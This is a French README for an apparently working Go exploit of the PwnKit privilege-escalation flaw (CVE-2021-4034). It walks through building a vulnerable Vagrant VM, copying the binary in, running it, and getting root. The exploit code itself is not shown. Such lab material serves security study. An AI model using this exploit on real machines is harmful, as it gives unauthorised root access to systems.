
Exploit pour la vulnérabilité PwnKit, CVE-2021-4034, écrit en Go
Il s'agit d'un exploit fonctionnel pour la vulnérabilité pwnkit, CVE-2021-4034, écrit en Go
Essayez-le :
# créer une machine vagrant vulnérable
$ make vm
...
# compiler le binaire et l'envoyer via scp vers la boîte vagrant
$ make scp
# se connecter en ssh à la boîte vagrant
$ make ssh
# L'utilisateur par défaut est "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# exécuter l'exploit
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root